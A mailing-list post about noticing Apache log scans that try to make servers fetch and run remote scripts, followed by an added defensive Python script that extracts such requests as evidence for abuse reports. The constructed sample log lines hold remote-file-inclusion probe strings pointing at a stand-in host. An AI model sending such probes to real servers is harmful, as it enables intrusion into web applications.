Mailing List Archive



[tlug] Dealing with webapp security scans



Hi,

Recently I have observed that my server is being scanned for security
breaches.
From Apache's log [1], I saw that most of the HTTP requests come over
connections that originate from compromised web servers.

The scanners scan for security breaches all over the Internet. When one
finds a hole to get in, it tries to get a script (for example,
advguestbook//img/verid.txt - see [1], scroll down) from a remote
host with one of the tools available on the system (curl,
libwww-perl's GET or lwp-download, fetch, lynx --sources) and executes
it. On my server, it looks like they are scanning for a PHPBB
security hole.

Question: How to deal with those compromised web servers? They are
hacked and being used as stepping stones. Should I report them? If so,
where should I report them?

[1] http://aoclife.ddo.jp/~vuhung/tmp/tlug/grep.libwww-perl.httpd.access.log.txt

-- 
Best Regards,
Nguyen Hung Vu ( Nguyễn Vũ Hưng )
vuhung16plus{remove}@example.com
An inquisitive look at Harajuku
http://www.flickr.com/photos/vuhung/sets/72157600109218238/
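
An added example, not part of the original post: one way to turn an access log like [1] into per-source evidence for an abuse report. It keys on requests whose query string carries a remote URL rather than on the libwww-perl user agent alone. The log lines, host names and the `inc` parameter are constructed, and Apache's combined log format is assumed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
                     r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# A URL carried inside the query string: the remote script the scanner wants fetched.
REMOTE_URL_RE = re.compile(r'(?:https?|ftp)://[^\s&;|\'"]+', re.I)

# Constructed sample lines (documentation addresses, made-up host and parameter names).
SAMPLE_LOG = """\
192.0.2.10 - - [12/May/2007:03:14:07 +0900] "GET /app.php?inc=http://host-a.example/advguestbook//img/verid.txt? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
192.0.2.10 - - [12/May/2007:03:14:09 +0900] "GET /forum/app.php?inc=http%3A%2F%2Fhost-a.example%2Fadvguestbook%2F%2Fimg%2Fverid.txt%3F HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
198.51.100.7 - - [12/May/2007:04:01:55 +0900] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
203.0.113.5 - - [12/May/2007:05:20:31 +0900] "GET /robots.txt HTTP/1.0" 200 68 "-" "libwww-perl/5.79"
"""

def summarize(lines):
    """Return {client_ip: evidence} for requests whose query embeds a remote URL."""
    report = defaultdict(lambda: {"hits": 0, "first": None, "last": None,
                                  "remote_urls": set(), "agents": set()})
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not combined format or truncated: skip rather than guess
        parts = m["req"].split()
        if len(parts) < 2:
            continue  # malformed request line
        # Decode percent-encoding first so encoded and plain probes compare equal.
        query = unquote(parts[1].partition("?")[2])
        urls = {u.rstrip("?") for u in REMOTE_URL_RE.findall(query)}
        if not urls:
            continue  # a scripted user agent alone is not treated as evidence
        ev = report[m["ip"]]
        ev["hits"] += 1
        ev["first"] = ev["first"] or m["ts"]   # log lines are in time order
        ev["last"] = m["ts"]
        ev["remote_urls"] |= urls
        ev["agents"].add(m["ua"])
    return dict(report)

if __name__ == "__main__":
    for ip, ev in summarize(SAMPLE_LOG.splitlines()).items():
        print(ip, ev["hits"], ev["first"], ev["last"],
              sorted(ev["remote_urls"]), sorted(ev["agents"]))
```

Each entry carries the source address and timestamps (with time zone) that an abuse contact needs to find the activity in their own logs; the embedded URL names a second host, the one serving the script. Legitimate applications that pass URLs in query strings will also match, so review the output before sending anything.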
